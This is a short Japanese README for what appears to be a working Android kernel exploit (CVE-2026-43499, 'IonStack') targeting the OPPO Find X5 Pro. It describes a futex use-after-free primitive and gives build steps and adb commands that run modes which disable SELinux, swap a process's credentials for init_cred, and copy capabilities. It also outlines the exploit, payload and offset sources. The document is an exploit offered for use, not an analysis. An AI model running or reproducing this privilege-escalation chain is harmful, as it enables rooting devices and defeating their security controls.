
GhostLock(CVE-2026-43499 / IonStack)OPPO Find X5 Pro(PFEM10)向けリサーチ:エクスプロイトチェーン、進捗、ブロッカーログ、OPPO 5シリーズカーネルノート
OPPO Find X5 Pro (PFEM10) 向けの CVE-2026-43499 (IonStack) エクスプロイト。
カーネル 5.10.236-android12-9-o、futex CMP_REQUEUE_PI UAF → pi-tree 書き込みプリミティブ。
自己責任で使用してください。パニック / 再起動が発生する可能性があります。ファームウェアを更新しないでください。
./build.sh # requires Android NDK r28c
ビルドパラメータは固定です (-O1 / android26) — 変更するとスタックジオメトリのキャリブレーションが壊れます。
adb push exploit /data/local/tmp/
adb shell /data/local/tmp/exploit W1 # SELinux permissive
adb shell /data/local/tmp/exploit W2 # child cred -> init_cred
adb shell /data/local/tmp/exploit W5 # caps-only cred copy
再起動をまたいで再試行: bash run.sh <mode> [attempts]
src/ exploit + payload + offsets (exploit.c, payload.c, pfem10_target.h)
lib/ KernelSnitch heap-leak library
model/ rtmutex chain-walk model (host verification)
oplus_root_check によりブロック中、caps-only ルートは進行中)CyberMeowfia · IonStack (original exploit)